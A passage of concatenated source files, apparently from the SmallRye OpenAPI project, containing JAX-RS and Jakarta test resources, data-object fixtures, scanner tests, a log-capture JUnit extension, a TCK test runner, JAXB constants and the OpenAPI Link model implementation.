@Callbacks(value = {
@Callback(name = "extendedCallback", callbackUrlExpression = "http://localhost:8080/resources/ext-callback", operations = @CallbackOperation(summary = "Get results", extensions = {
@Extension(name = "x-object", value = "{ \"key\":\"value\" }", parseValue = true),
@Extension(name = "x-object-unparsed", value = "{ \"key\":\"value\" }"),
@Extension(name = "x-array", value = "[ \"val1\",\"val2\" ]", parseValue = true),
@Extension(name = "x-booltrue", value = "true", parseValue = false) }, method = "get", responses = @APIResponse(responseCode = "200", description = "successful operation", content = @Content(mediaType = "application/json", schema = @Schema(type = SchemaType.ARRAY, implementation = String.class))))) })
public String get(String data) {
return data;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/Residents.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
public class Residents extends BaseModel {
String foo;
String bar;
public String getFoo() {
return foo;
}
public void setFoo(String foo) {
this.foo = foo;
}
public String getBar() {
return bar;
}
public void setBar(String bar) {
this.bar = bar;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/MultipartFormVerify.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import jakarta.ws.rs.FormParam;
public class MultipartFormVerify {
@FormParam(value = "token")
public String token;
@FormParam(value = "os")
public String os;
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/RequestBodyWidget.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
public class RequestBodyWidget {
long id;
String name;
}
<|start_filename|>extension-jaxrs/src/test/java/io/smallrye/openapi/runtime/scanner/IgnoreTests.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import java.io.IOException;
import org.eclipse.microprofile.openapi.models.media.Schema;
import org.jboss.jandex.ClassType;
import org.jboss.jandex.DotName;
import org.jboss.jandex.FieldInfo;
import org.jboss.jandex.Type;
import org.json.JSONException;
import org.junit.jupiter.api.Test;
import test.io.smallrye.openapi.runtime.scanner.entities.IgnoreSchemaOnFieldExample;
import test.io.smallrye.openapi.runtime.scanner.entities.IgnoreTestContainer;
import test.io.smallrye.openapi.runtime.scanner.entities.JsonIgnoreOnFieldExample;
import test.io.smallrye.openapi.runtime.scanner.entities.JsonIgnoreTypeExample;
import test.io.smallrye.openapi.runtime.scanner.entities.TransientFieldExample;
/**
* @author <NAME> {@literal <<EMAIL>>}
*/
class IgnoreTests extends JaxRsDataObjectScannerTestBase {
// Always ignore nominated properties when given class is used.
@Test
void testIgnore_jsonIgnorePropertiesOnClass() throws IOException, JSONException {
String name = IgnoreTestContainer.class.getName();
Type type = getFieldFromKlazz(name, "jipOnClassTest").type();
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context, type);
Schema result = scanner.process();
printToConsole(name, result);
assertJsonEquals(name, "ignore.jsonIgnorePropertiesOnClass.expected.json", result);
}
// Ignore nominated properties of the field in this instance only.
@Test
void testIgnore_jsonIgnorePropertiesOnField() throws IOException, JSONException {
String name = IgnoreTestContainer.class.getName();
FieldInfo fieldInfo = getFieldFromKlazz(name, "jipOnFieldTest");
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context, fieldInfo, fieldInfo.type());
Schema result = scanner.process();
printToConsole(name, result);
assertJsonEquals(name, "ignore.jsonIgnorePropertiesOnField.expected.json", result);
}
// Entirely ignore a single field once.
@Test
void testIgnore_jsonIgnoreField() throws IOException, JSONException {
DotName name = DotName.createSimple(JsonIgnoreOnFieldExample.class.getName());
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context,
ClassType.create(name, Type.Kind.CLASS));
Schema result = scanner.process();
printToConsole(name.local(), result);
assertJsonEquals(name.local(), "ignore.jsonIgnoreField.expected.json", result);
}
// Entirely ignore a single field once.
@Test
void testIgnore_jsonIgnoreType() throws IOException, JSONException {
DotName name = DotName.createSimple(JsonIgnoreTypeExample.class.getName());
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context,
ClassType.create(name, Type.Kind.CLASS));
Schema result = scanner.process();
printToConsole(name.local(), result);
assertJsonEquals(name.local(), "ignore.jsonIgnoreType.expected.json", result);
}
// Entirely ignore a single field once using JSON-B.
@Test
void testJavaxIgnore_jsonbTransientField() throws IOException, JSONException {
DotName name = DotName
.createSimple(test.io.smallrye.openapi.runtime.scanner.entities.JsonbTransientOnFieldExample.class.getName());
testIgnore_jsonbTransientField(name, "ignore.jsonbTransientField.expected.json");
}
@Test
void testJakartaIgnore_jsonbTransientField() throws IOException, JSONException {
DotName name = DotName.createSimple(
test.io.smallrye.openapi.runtime.scanner.entities.jakarta.JsonbTransientOnFieldExample.class.getName());
testIgnore_jsonbTransientField(name, "ignore.jakartaJsonbTransientField.expected.json");
}
void testIgnore_jsonbTransientField(DotName name, String expected) throws IOException, JSONException {
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context,
ClassType.create(name, Type.Kind.CLASS));
Schema result = scanner.process();
printToConsole(name.local(), result);
assertJsonEquals(name.local(), expected, result);
}
// Entirely ignore a single field once using hidden attribute of Schema.
@Test
void testIgnore_schemaHiddenField() throws IOException, JSONException {
DotName name = DotName.createSimple(IgnoreSchemaOnFieldExample.class.getName());
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context,
ClassType.create(name, Type.Kind.CLASS));
Schema result = scanner.process();
printToConsole(name.local(), result);
assertJsonEquals(name.local(), "ignore.schemaHiddenField.expected.json", result);
}
@Test
void testIgnore_transientField() throws IOException, JSONException {
DotName name = DotName.createSimple(TransientFieldExample.class.getName());
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context,
ClassType.create(name, Type.Kind.CLASS));
Schema result = scanner.process();
printToConsole(name.local(), result);
assertJsonEquals(name.local(), "ignore.transientField.expected.json", result);
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/entities/jakarta/JaxbWithNameGreeting.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.entities.jakarta;
import java.util.List;
import jakarta.xml.bind.annotation.XmlAttribute;
import jakarta.xml.bind.annotation.XmlElement;
import jakarta.xml.bind.annotation.XmlElementWrapper;
import jakarta.xml.bind.annotation.XmlRootElement;
@XmlRootElement(name = "MyGreeting")
public class JaxbWithNameGreeting {
@XmlAttribute
private final String message;
public JaxbWithNameGreeting(String message, String title, List<String> items) {
this.message = message;
this.title = title;
this.books = items;
}
public String getMessage() {
return message;
}
@XmlElementWrapper(name = "books-array")
@XmlElement(name = "item")
private final List<String> books;
public List<String> getBooks() {
return books;
}
@XmlElement(name = "xml-title")
private String title;
public String getTitle() {
return title;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ResteasyMultipartFormDataInputTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.Consumes;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.core.MediaType;
import org.jboss.resteasy.plugins.providers.multipart.MultipartFormDataInput;
@Path(value = "multipart-form-data-input")
public class ResteasyMultipartFormDataInputTestResource {
@POST
@Path(value = "post")
@Consumes(value = MediaType.MULTIPART_FORM_DATA)
@SuppressWarnings(value = "unused")
public void post(MultipartFormDataInput input) {
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/MultipartFormUploadIconForm.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import jakarta.ws.rs.FormParam;
public class MultipartFormUploadIconForm extends MultipartFormVerify {
@FormParam(value = "icon")
public byte[] icon;
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/jakarta/BaseUser.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject.jakarta;
import jakarta.validation.constraints.Min;
import jakarta.validation.constraints.NotNull;
public abstract class BaseUser {
@Min(value = 10)
@NotNull
protected Integer id;
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/Lizard.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import jakarta.json.bind.annotation.JsonbPropertyOrder;
@JsonbPropertyOrder(value = { "type", "lovesRocks" })
public class Lizard extends AbstractPet {
boolean lovesRocks;
}
<|start_filename|>core/src/main/java/io/smallrye/openapi/api/constants/JaxbConstants.java<|end_filename|>
package io.smallrye.openapi.api.constants;
import java.util.Arrays;
import java.util.List;
import org.jboss.jandex.DotName;
/**
* Constants related to the JAXB Specification
*
* @author <NAME> (<EMAIL>)
* @author <NAME> (<EMAIL>)
*/
public class JaxbConstants {
public static final List<DotName> JAXB_ELEMENT = Arrays.asList(
DotName.createSimple("javax.xml.bind.JAXBElement"),
DotName.createSimple("jakarta.xml.bind.JAXBElement"));
public static final List<DotName> XML_TYPE = Arrays.asList(
DotName.createSimple("javax.xml.bind.annotation.XmlType"),
DotName.createSimple("jakarta.xml.bind.annotation.XmlType"));
public static final List<DotName> XML_ELEMENT = Arrays.asList(
DotName.createSimple("javax.xml.bind.annotation.XmlElement"),
DotName.createSimple("jakarta.xml.bind.annotation.XmlElement"));
public static final List<DotName> XML_ATTRIBUTE = Arrays.asList(
DotName.createSimple("javax.xml.bind.annotation.XmlAttribute"),
DotName.createSimple("jakarta.xml.bind.annotation.XmlAttribute"));
public static final List<DotName> XML_ACCESSOR_TYPE = Arrays.asList(
DotName.createSimple("javax.xml.bind.annotation.XmlAccessorType"),
DotName.createSimple("jakarta.xml.bind.annotation.XmlAccessorType"));
public static final List<DotName> XML_TRANSIENT = Arrays.asList(
DotName.createSimple("javax.xml.bind.annotation.XmlTransient"),
DotName.createSimple("jakarta.xml.bind.annotation.XmlTransient"));
public static final List<DotName> XML_ROOTELEMENT = Arrays.asList(
DotName.createSimple("javax.xml.bind.annotation.XmlRootElement"),
DotName.createSimple("jakarta.xml.bind.annotation.XmlRootElement"));
public static final List<DotName> XML_WRAPPERELEMENT = Arrays.asList(
DotName.createSimple("javax.xml.bind.annotation.XmlElementWrapper"),
DotName.createSimple("jakarta.xml.bind.annotation.XmlElementWrapper"));
public static final String PROP_NAME = "name";
private JaxbConstants() {
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ResponseTypeUnindexedTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
@Path(value = "/unindexed")
public class ResponseTypeUnindexedTestResource {
// This type will not be in the Jandex index, nor does it implement Map or List.
static class ThirdPartyType {
}
@GET
@Produces(value = MediaType.TEXT_PLAIN)
public ThirdPartyType hello() {
return null;
}
}
<|start_filename|>core/src/test/java/io/smallrye/openapi/runtime/scanner/LogCapture.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import java.util.logging.Handler;
import java.util.logging.Level;
import java.util.logging.LogRecord;
import java.util.logging.Logger;
import org.junit.jupiter.api.extension.AfterEachCallback;
import org.junit.jupiter.api.extension.BeforeEachCallback;
import org.junit.jupiter.api.extension.ExtensionContext;
/**
* Capture logs from a named logger and make them available to the test
* <p>
* <code><pre>
* @RegisterExtension
* LogCapture c = new LogCapture(ClassUnderTest.class.getName());
*
* @Test
* public void test() {
* // do something to provoke a log message
* new ClassUnderTest().logMyMessage();
*
* LogRecord r = c.assertLogContaining("My Special Message");
* assertEquals(Level.INFO, r.getLevel());
* }
* </pre></code>
*/
public class LogCapture implements BeforeEachCallback, AfterEachCallback {
private String loggerName;
private Logger logger;
private TestHandler handler;
private Level oldLevel;
public LogCapture(String loggerName) {
this.loggerName = loggerName;
}
@Override
public void beforeEach(ExtensionContext context) throws Exception {
logger = Logger.getLogger(loggerName);
handler = new TestHandler();
logger.addHandler(handler);
oldLevel = logger.getLevel();
logger.setLevel(Level.ALL);
}
@Override
public void afterEach(ExtensionContext context) throws Exception {
if (handler != null) {
logger.removeHandler(handler);
}
if (logger != null) {
logger.setLevel(oldLevel);
}
}
public List<LogRecord> getAll() {
synchronized (handler.records) {
return new ArrayList<>(handler.records);
}
}
public LogRecord assertLogContaining(String substring) {
synchronized (handler.records) {
for (LogRecord r : handler.records) {
if (r.getMessage().contains(substring)) {
return r;
}
}
StringBuilder sb = new StringBuilder();
sb.append("Log containing \"").append(substring).append("\" was not found.");
sb.append("\n");
sb.append("Log records recorded:\n");
if (handler.records.isEmpty()) {
sb.append("<no records>\n");
}
for (LogRecord r : handler.records) {
sb.append("[").append(r.getLevel()).append("] ");
sb.append(r.getMessage()).append("\n");
}
throw new AssertionError(sb.toString());
}
}
private static class TestHandler extends Handler {
private List<LogRecord> records = Collections.synchronizedList(new ArrayList<>());
@Override
public void publish(LogRecord record) {
records.add(record);
}
@Override
public void flush() {
}
@Override
public void close() throws SecurityException {
}
}
}
<|start_filename|>testsuite/extra/src/test/java/test/io/smallrye/openapi/tck/ExtraTestRunner.java<|end_filename|>
/**
* Copyright 2018 Red Hat, Inc, and individual contributors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package test.io.smallrye.openapi.tck;
import java.io.File;
import java.io.FileWriter;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.lang.reflect.ParameterizedType;
import java.security.AccessController;
import java.security.PrivilegedAction;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Comparator;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.stream.Collectors;
import org.apache.commons.io.IOUtils;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.jboss.arquillian.container.test.api.Deployment;
import org.jboss.arquillian.testng.Arquillian;
import org.jboss.jandex.IndexView;
import org.jboss.shrinkwrap.api.Archive;
import org.junit.jupiter.api.Assertions;
import org.testng.annotations.DataProvider;
import org.testng.annotations.Ignore;
import org.testng.annotations.Test;
import io.smallrye.openapi.api.OpenApiConfig;
import io.smallrye.openapi.api.OpenApiDocument;
import io.smallrye.openapi.runtime.OpenApiProcessor;
import io.smallrye.openapi.runtime.OpenApiStaticFile;
import io.smallrye.openapi.runtime.io.Format;
import io.smallrye.openapi.runtime.io.OpenApiSerializer;
/**
* A test runner used to quickly run the OpenAPI extra tests directly against the
* {@link OpenApiDocument} without spinning up an MP compliant server. This is used
* as a helper for generating and running Junit DynamicTests from ExtraSuiteTestBase.
*
* @author <EMAIL>
*/
@SuppressWarnings("rawtypes")
public class ExtraTestRunner {
private Class<?> testClass;
private Class<? extends Arquillian> nestedTestClass;
public static Map<Class, OpenAPI> OPEN_API_DOCS = new HashMap<>();
/**
* Constructor.
*
* @param testClass
* @throws InitializationError
*/
public ExtraTestRunner(Class<?> testClass) throws Exception {
this.testClass = testClass;
this.nestedTestClass = determineTestClass(testClass);
// The Archive (shrinkwrap deployment)
Archive archive = archive();
// MPConfig
OpenApiConfig config = ArchiveUtil.archiveToConfig(archive);
IndexView index = ArchiveUtil.archiveToIndex(config, archive);
OpenApiStaticFile staticFile = ArchiveUtil.archiveToStaticFile(archive);
OpenAPI openAPI = OpenApiProcessor.bootstrap(config, index, getContextClassLoader(), staticFile);
Assertions.assertNotNull(openAPI, "Generated OAI document must not be null.");
OPEN_API_DOCS.put(testClass, openAPI);
// Output the /openapi content to a file for debugging purposes
File parent = new File("target", "testsuite-extra");
if (!parent.exists()) {
parent.mkdir();
}
File file = new File(parent, testClass.getName() + ".json");
String content = OpenApiSerializer.serialize(openAPI, Format.JSON);
try (FileWriter writer = new FileWriter(file)) {
IOUtils.write(content, writer);
}
}
/**
* Creates and returns the shrinkwrap archive for this test.
*/
private Archive archive() throws Exception {
Method[] methods = nestedTestClass.getMethods();
for (Method method : methods) {
if (method.isAnnotationPresent(Deployment.class)) {
Archive archive = (Archive) method.invoke(null);
return archive;
}
}
throw ExtraSuiteMessages.msg.missingDeploymentArchive();
}
/**
* Figures out what test class is being run.
*
* @throws InitializationError
*/
@SuppressWarnings("unchecked")
private Class<? extends Arquillian> determineTestClass(Class<?> testClass) {
ParameterizedType ptype = (ParameterizedType) testClass.getGenericSuperclass();
Class cc = (Class) ptype.getActualTypeArguments()[0];
return cc;
}
List<ExtraSuiteGeneratedTestProxy> getChildren() {
List<ExtraSuiteGeneratedTestProxy> children = new ArrayList<>();
Method[] methods = nestedTestClass.getMethods();
for (Method method : methods) {
if (method.isAnnotationPresent(Test.class)) {
try {
Object theTestObj = this.testClass.newInstance();
Arquillian delegate = createDelegate(theTestObj);
Test testAnnotation = method.getAnnotation(Test.class);
String providerMethodName = testAnnotation.dataProvider();
Method providerMethod = null;
for (Method m : nestedTestClass.getMethods()) {
if (m.isAnnotationPresent(DataProvider.class)) {
DataProvider provider = m.getAnnotation(DataProvider.class);
if (provider.name().equals(providerMethodName)) {
providerMethod = m;
break;
}
}
}
if (method.getParameterCount() > 0 && providerMethod != null) {
Object[][] args = (Object[][]) providerMethod.invoke(delegate);
for (Object[] arg : args) {
children.add(ExtraSuiteGeneratedTestProxy.create(delegate, theTestObj, method, arg));
}
} else {
children.add(ExtraSuiteGeneratedTestProxy.create(delegate, theTestObj, method, new Object[0]));
}
} catch (Exception e) {
throw new RuntimeException(e);
}
}
}
children.sort(new Comparator<ExtraSuiteGeneratedTestProxy>() {
@Override
public int compare(ExtraSuiteGeneratedTestProxy o1, ExtraSuiteGeneratedTestProxy o2) {
return o1.getTestMethod().getName().compareTo(o2.getTestMethod().getName());
}
});
return children;
}
/**
* Creates the delegate test instance. This is done by instantiating the test itself
* and calling its "getDelegate()" method. If no such method exists then an error
* is thrown.
*/
private Arquillian createDelegate(Object testObj) throws Exception {
Object delegate = testObj.getClass().getMethod("getDelegate").invoke(testObj);
return (Arquillian) delegate;
}
String describeChild(ExtraSuiteGeneratedTestProxy child) {
StringBuilder name = new StringBuilder(child.getTestMethod().getName());
if (child.getArguments().length > 0) {
name.append(' ');
name.append(Arrays.stream(child.getArguments()).map(Object::toString).collect(Collectors.joining(",")));
}
return name.toString();
}
protected void runChild(final ExtraSuiteGeneratedTestProxy child) throws Throwable {
OpenApiDocument.INSTANCE.set(ExtraTestRunner.OPEN_API_DOCS.get(child.getTest().getClass()));
if (isIgnored(child)) {
return;
}
try {
Method testMethod = child.getTestMethod();
testMethod.invoke(child.getDelegate(), child.getArguments());
} catch (InvocationTargetException e) {
Throwable cause = e.getCause();
Test testAnno = child.getTestMethod().getAnnotation(Test.class);
Class[] expectedExceptions = testAnno.expectedExceptions();
if (expectedExceptions != null && expectedExceptions.length > 0) {
Class expectedException = expectedExceptions[0];
Assertions.assertEquals(expectedException, cause.getClass());
} else {
throw cause;
}
}
}
boolean isIgnored(ExtraSuiteGeneratedTestProxy child) {
Method testMethod = child.getTestMethod();
if (testMethod.isAnnotationPresent(Ignore.class)) {
return true;
}
Method testMethodOverride;
try {
testMethodOverride = testClass.getMethod(testMethod.getName(), testMethod.getParameterTypes());
return testMethodOverride.isAnnotationPresent(Ignore.class);
} catch (NoSuchMethodException | SecurityException e) {
// Ignore, no override has been specified in the ExtraSuiteTestBase subclass
}
return false;
}
private static ClassLoader getContextClassLoader() {
if (System.getSecurityManager() == null) {
return Thread.currentThread().getContextClassLoader();
}
return AccessController
.doPrivileged((PrivilegedAction<ClassLoader>) () -> Thread.currentThread().getContextClassLoader());
}
}
<|start_filename|>testsuite/tck/src/test/java/io/smallrye/openapi/tck/AfterDeployObserver.java<|end_filename|>
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.smallrye.openapi.tck;
import org.jboss.arquillian.container.spi.event.container.AfterDeploy;
import org.jboss.arquillian.core.api.annotation.Observes;
import io.restassured.RestAssured;
/**
* This sets the RestAssured.basePath to the Arquillian generated archive name, mapped to the context root.
*/
public class AfterDeployObserver {
public void afterDeploy(@Observes final AfterDeploy afterDeploy) {
RestAssured.basePath = afterDeploy.getDeployment().getArchive().getName();
}
}
<|start_filename|>ui/open-api-ui-forms/src/index.js<|end_filename|>
import React from "react";
import ReactDOM from "react-dom";
import MyOpenAPIForm from "./App";
ReactDOM.render(
<MyOpenAPIForm />,
document.getElementById('rrr')
);
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/RolesAllowedResource1.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import jakarta.annotation.security.DenyAll;
import jakarta.annotation.security.PermitAll;
import jakarta.annotation.security.RolesAllowed;
import jakarta.ws.rs.GET;
import jakarta.ws.rs.Path;
import jakarta.ws.rs.Produces;
import jakarta.ws.rs.core.Response;
@Path(value = "/v1")
@RolesAllowed(value = "admin")
@SuppressWarnings(value = "unused")
public class RolesAllowedResource1 {
@GET
@Path(value = "secured")
@Produces(value = "application/json")
public Response getSecuredData(int id) {
return null;
}
@GET
@Path(value = "open")
@Produces(value = "application/json")
@PermitAll
public Response getOpenData(int id) {
return null;
}
@GET
@Path(value = "locked")
@Produces(value = "application/json")
@DenyAll
public Response getLockedData(int id) {
return null;
}
}
<|start_filename|>core/src/main/java/io/smallrye/openapi/api/models/links/LinkImpl.java<|end_filename|>
package io.smallrye.openapi.api.models.links;
import java.util.LinkedHashMap;
import java.util.Map;
import org.eclipse.microprofile.openapi.models.links.Link;
import org.eclipse.microprofile.openapi.models.servers.Server;
import io.smallrye.openapi.api.constants.OpenApiConstants;
import io.smallrye.openapi.api.models.ExtensibleImpl;
import io.smallrye.openapi.api.models.ModelImpl;
import io.smallrye.openapi.runtime.util.ModelUtil;
/**
* An implementation of the {@link Link} OpenAPI model interface.
*/
public class LinkImpl extends ExtensibleImpl<Link> implements Link, ModelImpl {
private String ref;
private String operationRef;
private String operationId;
private Map<String, Object> parameters;
private Object requestBody;
private String description;
private Server server;
/**
* @see org.eclipse.microprofile.openapi.models.Reference#getRef()
*/
@Override
public String getRef() {
return this.ref;
}
/**
* @see org.eclipse.microprofile.openapi.models.Reference#setRef(java.lang.String)
*/
@Override
public void setRef(String ref) {
if (ref != null && !ref.contains("/")) {
ref = OpenApiConstants.REF_PREFIX_LINK + ref;
}
this.ref = ref;
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#getServer()
*/
@Override
public Server getServer() {
return this.server;
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#setServer(org.eclipse.microprofile.openapi.models.servers.Server)
*/
@Override
public void setServer(Server server) {
this.server = server;
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#getOperationRef()
*/
@Override
public String getOperationRef() {
return this.operationRef;
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#setOperationRef(java.lang.String)
*/
@Override
public void setOperationRef(String operationRef) {
this.operationRef = operationRef;
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#getRequestBody()
*/
@Override
public Object getRequestBody() {
return this.requestBody;
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#setRequestBody(java.lang.Object)
*/
@Override
public void setRequestBody(Object requestBody) {
this.requestBody = requestBody;
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#getOperationId()
*/
@Override
public String getOperationId() {
return this.operationId;
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#setOperationId(java.lang.String)
*/
@Override
public void setOperationId(String operationId) {
this.operationId = operationId;
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#getParameters()
*/
@Override
public Map<String, Object> getParameters() {
return ModelUtil.unmodifiableMap(this.parameters);
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#setParameters(java.util.Map)
*/
@Override
public void setParameters(Map<String, Object> parameters) {
this.parameters = ModelUtil.replace(parameters, LinkedHashMap<String, Object>::new);
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#addParameter(java.lang.String, java.lang.Object)
*/
@Override
public Link addParameter(String name, Object parameter) {
this.parameters = ModelUtil.add(name, parameter, this.parameters, LinkedHashMap<String, Object>::new);
return this;
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#removeParameter(java.lang.String)
*/
@Override
public void removeParameter(String name) {
ModelUtil.remove(this.parameters, name);
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#getDescription()
*/
@Override
public String getDescription() {
return this.description;
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#setDescription(java.lang.String)
*/
@Override
public void setDescription(String description) {
this.description = description;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/Apple.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
public class Apple {
public String name;
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/Lizard.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
public class Lizard extends AbstractAnimal implements Reptile {
@Schema(deprecated = true)
static String scaleColor;
boolean lovesRocks;
@Override
public String getScaleColor() {
return "green";
}
public void setScaleColor(String scaleColor) {
// Bad idea, but doing it anyway ;-)
Lizard.scaleColor = scaleColor;
}
public void setAge(String age) {
super.setAge(Integer.parseInt(age));
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/BeanParamAddon.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.HeaderParam;
public interface BeanParamAddon {
@HeaderParam(value = "hi1")
void setHeaderParam1(String value);
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/TestEnum.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
@Schema
public enum TestEnum {
ABC,
DEF
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ParameterInBeanFromSetterTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.BeanParam;
import javax.ws.rs.DefaultValue;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
import javax.ws.rs.PathParam;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
@Path(value = "/parameter-in-bean-from-setter/{id}/{id2}")
@SuppressWarnings(value = "unused")
public class ParameterInBeanFromSetterTestResource {
public static class Bean {
@PathParam(value = "id")
@DefaultValue(value = "BEAN-FROM-SETTER")
String id;
}
private Bean param;
@BeanParam
public void setParam(Bean param) {
this.param = param;
}
@GET
@Produces(value = MediaType.APPLICATION_JSON)
public Widget get(@PathParam(value = "id2") String id2) {
return null;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/MultipleContentTypesWithFormParamsTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.Consumes;
import javax.ws.rs.FormParam;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.core.MediaType;
import org.eclipse.microprofile.openapi.annotations.Operation;
import org.eclipse.microprofile.openapi.annotations.media.Content;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
import org.eclipse.microprofile.openapi.annotations.parameters.RequestBody;
@Path(value = "/multiple-content-types-with-form-params")
@SuppressWarnings(value = "unused")
public class MultipleContentTypesWithFormParamsTestResource {
@POST
@Path(value = "/widgets/create")
@Consumes(value = MediaType.APPLICATION_JSON)
@Operation(operationId = "createWidget")
public void createWidget(
@RequestBody(required = true, content = @Content(schema = @Schema(implementation = Widget.class))) final Widget w) {
}
@POST
@Path(value = "/widgets/create")
@Consumes(value = MediaType.APPLICATION_FORM_URLENCODED)
@Operation(operationId = "createWidget")
public void createWidget(@FormParam(value = "id") String id, @FormParam(value = "name") String name) {
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/BeanParamImpl.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import jakarta.ws.rs.CookieParam;
public class BeanParamImpl extends BeanParamBase implements BeanParamAddon {
@CookieParam(value = "cc1")
String cc1;
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/jakarta/User.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject.jakarta;
import jakarta.validation.constraints.Max;
import jakarta.validation.constraints.Positive;
public interface User {
@Positive
@Max(value = 9999)
Integer getId();
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/Policy437Resource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
@Path(value = "/")
public class Policy437Resource {
@GET
@Path(value = "/beanparamimpl")
public Policy437 getWithBeanParams() {
return null;
}
}
<|start_filename|>testsuite/extra/src/test/java/io/smallrye/openapi/tck/extra/ComplexResourceTest.java<|end_filename|>
/*
* Copyright 2018 Red Hat, Inc.
*
